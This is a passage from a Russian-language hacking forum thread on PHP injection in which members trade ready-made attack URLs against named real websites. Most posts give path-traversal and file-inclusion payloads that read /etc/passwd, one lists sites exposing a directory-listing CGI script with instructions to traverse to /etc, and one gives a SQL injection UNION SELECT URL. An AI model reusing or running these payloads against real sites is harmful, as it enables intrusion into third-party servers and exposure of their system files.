PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    PR-4
    для любителей нетрадиционного метода набора текста =))

     
  2. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    391
    Likes Received:
    247
    Reputations:
    88
    insfocus.com
    http://www.insfocus.com/site.php?page=[inc]
     
  3. Lamersha

    Lamersha Member

    Joined:
    11 Dec 2007
    Messages:
    6
    Likes Received:
    6
    Reputations:
    0
    http://lwdb.ru/index.php?part=[x3]
    не пинайте раскрыть не смогла
     
    1 person likes this.
  4. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    Lamersha там нет инклуда

    http://lwdb.ru/index.php?part=123%00
     
  5. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    gibson там нет инклуда (с) blackybr
     
    1 person likes this.
  6. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Code:
    http://shems.h1.ru/?../../../../../../../etc/passwd
     
  7. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    Да. товарищи, читайте внимательно маны и правила. тема называется php иньекция.

    file_get_content, рид функции, и неполные инклуды аля https://forum.antichat.ru/showpost.php?p=613811&postcount=635 не являются таковыми. впредь буду удалять и минусовать.
     
  8. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    http://www.shu.ru/index.php?link2=../../../../../../etc/passwd


    У меня попутно вопрос. Ну и нашел я эти пароли а что дальше то? куда их пихать? что делать?
     
    #628 truelamer, 8 Mar 2008
    Last edited by a moderator: 8 Mar 2008
  9. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    это не пароли паролей там вообще нет .
    Почитай вот для начала

    https://forum.antichat.ru/threadnav12123-1-10-php+Injection.html
    http://forum.web-hack.ru/index.php?showtopic=33063&go=1
    http://www.inattack.ru/article/478.html (Zadoxlik ;) )
     
    #629 ~!DoK_tOR!~, 8 Mar 2008
    Last edited: 8 Mar 2008
    1 person likes this.
  10. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    Вот нашел такую штуку

    http://forum.wileyeurope.com/cgi-bin/dcforum/install_help.cgi
    http://www.livingdonorsonline.org/cgi-bin/dcforum/install_help.cgi
    http://www.sciential.net/cgi-bin/dcforum/install_help.cgi
    http://www.variety.ru/cgi-bin/dcforum/install_help.cgi
    http://www.dla.org/cgi-bin/dcforum/install_help.cgi
    http://www.atlantadna.org/cgi-bin/dcforum/install_help.cgi
    http://www.flightadventures.com/cgi-bin/dcforum/install_help.cgi
    http://www.telephonyworld.com/cgi-bin/dcforum/install_help.cgi
    http://bricoespacio.estilisimo.com/cgi-bin/dcforum/install_help.cgi
    http://www.pursuit-performance.com.au/cgi-bin/dcforum/install_help.cgi
    http://www.homeandgardensite.com/cgi-bin/dcforum/install_help.cgi
    http://www.immnet.com/cgi-bin/dcforum/install_help.cgi
    http://www.sciential.net/cgi-bin/dcforum/install_help.cgi
    http://world-templates.com/cgi-bin/dcforum/install_help.cgi



    install_help.cgi - Этот сценарий составит список содержимого директорий
    в поле ввода пишите
    ../../../../../../../etc и получаете то что хотели
    Вот еще бы файлы бы открывал цены бы ему небыло
    Не ругайтесь если не туда выложил
     
    #630 neon_fx, 9 Mar 2008
    Last edited: 9 Mar 2008
    1 person likes this.
  11. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    HTML:
    http://www.script.com.ua/dev/materials.php?id=../../../../../../../../../../../../etc/passwd
     
  12. Tyc00n

    Tyc00n Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    30
    Likes Received:
    25
    Reputations:
    -1
    Code:
    http://www.nxne.com/page.php?page=../../../../../../../etc/passwd
    Code:
    http://www.nxne.com/page.php?page=../../../../../../../etc/passwd
    Code:
    http://www.crashrecords.co.uk/online/page.php?xPage=../../../../../../../etc/passwd
    Code:
    http://www.bristolferry.com/page.php?xPage=../../../../../../../etc/passwd
    Code:
    http://www.famousquotes.com/page.php?page=../../../../../../../etc/passwd
    Code:
    http://www.ceenorm.co.uk/page.php?xPage=../../../../../../../etc/passwd
     
    1 person likes this.
  13. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    для любителей нетрадиционного метода набора текста
    microsoft.com зареган на tucows)

    tucows.com
    http://tucows.com/software.html?t2=[FFF]
     
  14. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    Code:
    http://www.novistil.ru/index.php?option=com_zilchcatalog&task=view&id=EBLO
    
     
  15. nex0

    nex0 Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    52
    Likes Received:
    83
    Reputations:
    6
    Code:
    http://www.coolermaster.ru/index.php?LT=english&Language_s=2&url_place=product_class_include&files=../../../../../../../../etc/passwd
     
  16. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2
    после просмотра фильма ал пачино пошел на сайт его смотреть нашел шотбокс. но у шотбокс аллергия на скобки пока только это смог кто дальше сможет :)
    Code:
    http://www.alpacino.in/shoutie/shouts.php?include=../../../../../etc/passwd
     
  17. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    http://upload.nostra.by/search.php?action=zalupa
     
  18. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    Muhacir, может это тебе согреет душу)
    bobob, сорри, если ты про эту скуль;)
    http://www.alpacino.in/index.php?mact=Album,cntnt01,default,0&cntnt01albumid=4&cntnt01pictureid=52&cntnt01returnid=9999999999'+UNION+SELECT+1,2,3,4,5,6,7,8,9/*
     
    2 people like this.
  19. Loker

    Loker Elder - Старейшина

    Joined:
    25 Oct 2007
    Messages:
    46
    Likes Received:
    23
    Reputations:
    5
    http://rusxmms.sourceforge.net/index.php?page=tis
     
  20. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    Code:
    http://www.clinlab-kafedra.ru/main.php?file=../../../../../../../../../../../etc/passwd
    http://www.globalloan.co.kr/company/main.php?file=../../../../../../../../../../../etc/passwd
    http://www.globalloan.co.kr/customer/main.php?file=../../../../../../../../../../../etc/passwd
    http://chess.clustertech.com/cn/main.php?file=../../../../../../../../../../../etc/passwd
    http://www.gooodworld.co.kr/main.php?file=../../../../../../../../../../../etc/passwd
    http://adee.dental.tcd.ie/index.php?file=../../../../../../../../../../../etc/passwd
    http://www.pjha.org/index.php?file=../../../../../../../../../../../etc/passwd
    http://www.penguinadventure.com/index.php?file=../../../../../../../../../../../etc/passwd
    http://www.ash.coop/downloadfile.php?file=../../../../../../../../../../../etc/passwd
    http://www.tigr.org/tdb/e2k1/ath1/qpcr/downloadfile.php?file=../../../../../../../../../../../etc/passwd
    http://www.bier-degustationen.ch/downloadFile.php?file=../../../../../../../../../../../etc/passwd
    http://voaklabs.com/downloadFile.php?file=../../../../../../../../../../../etc/passwd
    http://www.ms-ins.co.th/claim_service/downloadFile.php?file=../../../../../../../../../../../etc/passwd
    http://www.bierverkostung.ch/downloadFile.php?file=../../../../../../../../../../../etc/passwd
     
    #640 bag, 25 Mar 2008
    Last edited: 25 Mar 2008